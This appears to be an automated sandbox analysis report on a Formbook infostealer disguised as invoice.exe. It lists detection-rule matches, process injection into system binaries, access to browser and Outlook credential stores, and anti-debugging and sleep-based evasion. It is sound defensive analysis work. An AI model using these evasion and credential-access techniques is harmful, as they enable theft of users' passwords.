            Source: 00000003.00000002.3575236547.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1867193556.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.3576582157.00000000037C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3576662143.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1867580811.0000000003760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.3576480081.0000000002850000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1867970632.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/3@16/9
            Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_00FEA0F4 GetLastError,FormatMessageW,0_2_00FEA0F4
            Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_00FD84F3 AdjustTokenPrivileges,CloseHandle,0_2_00FD84F3
            Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_00FD8AA3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00FD8AA3
            Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_00FEB3BF SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00FEB3BF
            Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_00FFEF21 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00FFEF21
            Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_00FF84D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_00FF84D0
            Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_00F84FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00F84FE9
            Source: C:\Users\user\Desktop\invoice.exe File created: C:\Users\user\AppData\Local\Temp\aut42FE.tmp
            Source: invoice.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\invoice.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: at.exe, 00000003.00000003.2150572886.00000000035C1000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000003.2151608695.00000000035C1000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000002.3575543840.00000000035C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: invoice.exe ReversingLabs: Detection: 23%
            Source: invoice.exe Virustotal: Detection: 30%
            Source: unknown Process created: C:\Users\user\Desktop\invoice.exe "C:\Users\user\Desktop\invoice.exe"
            Source: C:\Users\user\Desktop\invoice.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\invoice.exe"
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe Process created: C:\Windows\SysWOW64\at.exe "C:\Windows\SysWOW64\at.exe"
            Source: C:\Windows\SysWOW64\at.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\invoice.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\invoice.exe"
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe Process created: C:\Windows\SysWOW64\at.exe "C:\Windows\SysWOW64\at.exe"
            Source: C:\Windows\SysWOW64\at.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\invoice.exe Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\invoice.exe Section loaded: version.dll
            Source: C:\Users\user\Desktop\invoice.exe Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\invoice.exe Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\invoice.exe Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\invoice.exe Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\invoice.exe Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\invoice.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\invoice.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\invoice.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\invoice.exe Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\invoice.exe Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\at.exe Section loaded: schedcli.dll
            Source: C:\Windows\SysWOW64\at.exe Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\at.exe Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\at.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\at.exe Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\at.exe Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\at.exe Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\at.exe Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\at.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\at.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\at.exe Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\at.exe Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\at.exe Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\at.exe Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\at.exe Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\at.exe Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\at.exe Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\at.exe Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\at.exe Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\at.exe Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\at.exe Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\at.exe Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\at.exe Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\at.exe Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe Section loaded: wininet.dll
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe Section loaded: rasadhlp.dll
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe Section loaded: fwpuclnt.dll
            Source: C:\Windows\SysWOW64\at.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
            Source: C:\Windows\SysWOW64\at.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: invoice.exe Static file information: File size 1281536 > 1048576
            Source: invoice.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: invoice.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: invoice.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: invoice.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: invoice.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: invoice.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: invoice.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: at.pdb source: svchost.exe, 00000001.00000003.1826096007.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1867363177.0000000003200000.00000004.00000020.00020000.00000000.sdmp, usnnduqerdgHbr.exe, 00000002.00000002.3575669799.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: usnnduqerdgHbr.exe, 00000002.00000000.1784643817.0000000000DCE000.00000002.00000001.01000000.00000004.sdmp, usnnduqerdgHbr.exe, 00000007.00000002.3576287714.0000000000DCE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: invoice.exe, 00000000.00000003.1718353070.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, invoice.exe, 00000000.00000003.1717554649.0000000004260000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1867610826.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1767065111.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1867610826.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1768545238.0000000003700000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000003.1869790463.0000000003978000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000002.3576797983.0000000003B20000.00000040.00001000.00020000.00000000.sdmp, at.exe, 00000003.00000003.1867832412.00000000037CB000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000002.3576797983.0000000003CBE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: invoice.exe, 00000000.00000003.1718353070.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, invoice.exe, 00000000.00000003.1717554649.0000000004260000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1867610826.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1767065111.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1867610826.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1768545238.0000000003700000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000003.1869790463.0000000003978000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000002.3576797983.0000000003B20000.00000040.00001000.00020000.00000000.sdmp, at.exe, 00000003.00000003.1867832412.00000000037CB000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000002.3576797983.0000000003CBE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: at.pdbGCTL source: svchost.exe, 00000001.00000003.1826096007.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1867363177.0000000003200000.00000004.00000020.00020000.00000000.sdmp, usnnduqerdgHbr.exe, 00000002.00000002.3575669799.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: at.exe, 00000003.00000002.3577269049.000000000414C000.00000004.10000000.00040000.00000000.sdmp, at.exe, 00000003.00000002.3575543840.0000000003542000.00000004.00000020.00020000.00000000.sdmp, usnnduqerdgHbr.exe, 00000007.00000000.1933940894.0000000002B2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2261440991.000000001055C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: at.exe, 00000003.00000002.3577269049.000000000414C000.00000004.10000000.00040000.00000000.sdmp, at.exe, 00000003.00000002.3575543840.0000000003542000.00000004.00000020.00020000.00000000.sdmp, usnnduqerdgHbr.exe, 00000007.00000000.1933940894.0000000002B2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2261440991.000000001055C000.00000004.80000000.00040000.00000000.sdmp
            Source: invoice.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: invoice.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: invoice.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: invoice.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: invoice.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_00FFC104 LoadLibraryA,GetProcAddress,0_2_00FFC104
            Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_00FE8538 push FFFFFF8Bh; iretd 0_2_00FE853A
            Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_00FAE88F push edi; ret 0_2_00FAE891
            Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_00FAE9A8 push esi; ret 0_2_00FAE9AA
            Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_00FA8AC5 push ecx; ret 0_2_00FA8AD8
            Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_00FAEB83 push esi; ret 0_2_00FAEB85
            Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_00FAEC6C push edi; ret 0_2_00FAEC6E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004030B7 pushfd ; retf 1_2_004030B8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00426973 push es; ret 1_2_00426986
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00418110 push eax; iretd 1_2_00418114
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0041411E push edi; ret 1_2_0041411F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00411A74 pushad ; iretd 1_2_00411A84
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00414AB4 pushad ; retf 1_2_00414AB5
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00403460 push eax; ret 1_2_00403462
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004164EE push esp; ret 1_2_004164EF
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0390225F pushad ; ret 1_2_039027F9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039027FA pushad ; ret 1_2_039027F9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039309AD push ecx; mov dword ptr [esp], ecx 1_2_039309B6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0390283D push eax; iretd 1_2_03902858
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03901368 push eax; iretd 1_2_03901369

            Boot Survival

            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe Process created: C:\Windows\SysWOW64\at.exe "C:\Windows\SysWOW64\at.exe"
            Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_00F84A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00F84A35
            Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_010053DF IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_010053DF
            Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_00FA3307 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00FA3307
            Source: C:\Users\user\Desktop\invoice.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\invoice.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\at.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\at.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\at.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\at.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\at.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\invoice.exe API/Special instruction interceptor: Address: 152E80C
            Source: C:\Windows\SysWOW64\at.exe API/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\at.exe API/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\at.exe API/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\at.exe API/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\at.exe API/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\at.exe API/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\at.exe API/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\at.exe API/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0397096E rdtsc 1_2_0397096E
            Source: C:\Windows\SysWOW64\at.exe Window / User API: threadDelayed 5280
            Source: C:\Windows\SysWOW64\at.exe Window / User API: threadDelayed 4693
            Source: C:\Users\user\Desktop\invoice.exe API coverage: 4.6 %
            Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\at.exe TID: 6960 Thread sleep count: 5280 > 30
            Source: C:\Windows\SysWOW64\at.exe TID: 6960 Thread sleep time: -10560000s >= -30000s
            Source: C:\Windows\SysWOW64\at.exe TID: 6960 Thread sleep count: 4693 > 30
            Source: C:\Windows\SysWOW64\at.exe TID: 6960 Thread sleep time: -9386000s >= -30000s
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe TID: 2008 Thread sleep time: -65000s >= -30000s
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe TID: 2008 Thread sleep count: 32 > 30
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe TID: 2008 Thread sleep time: -32000s >= -30000s
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe TID: 2008 Thread sleep time: -34500s >= -30000s
            Source: C:\Windows\SysWOW64\at.exe Last function: Thread delayed
            Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_00FE449B GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00FE449B
            Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_00FEC7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_00FEC7E8
            Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_00FEC75D FindFirstFileW,FindClose, 0_2_00FEC75D
            Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_00FEF021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00FEF021
            Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_00FEF17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00FEF17E
            Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_00FEF47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00FEF47F
            Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_00FE3833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00FE3833
            Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_00FE3B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00FE3B56
            Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_00FEBD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00FEBD48
            Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_00F84AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00F84AFE
            Source: at.exe, 00000003.00000002.3575543840.0000000003542000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: usnnduqerdgHbr.exe, 00000007.00000002.3576006370.0000000000ADF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllc
            Source: firefox.exe, 00000008.00000002.2263017191.00000134D049C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll==
            Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\at.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0397096E rdtsc 1_2_0397096E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00417703 LdrLoadDll, 1_2_00417703
            Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_00FF401F BlockInput, 0_2_00FF401F
            Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_00F83B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00F83B4C
            Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_00FB5BFC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00FB5BFC
            Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_00FFC104 LoadLibraryA,GetProcAddress, 0_2_00FFC104
            Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_0152D468 mov eax, dword ptr fs:[00000030h] 0_2_0152D468
            Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_0152EA78 mov eax, dword ptr fs:[00000030h] 0_2_0152EA78
            Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_0152EAD8 mov eax, dword ptr fs:[00000030h] 0_2_0152EAD8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03928397 mov eax, dword ptr fs:[00000030h] 1_2_03928397
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392E388 mov eax, dword ptr fs:[00000030h] 1_2_0392E388
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395438F mov eax, dword ptr fs:[00000030h] 1_2_0395438F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039DE3DB mov eax, dword ptr fs:[00000030h] 1_2_039DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039DE3DB mov ecx, dword ptr fs:[00000030h] 1_2_039DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039DE3DB mov eax, dword ptr fs:[00000030h] 1_2_039DE3DB
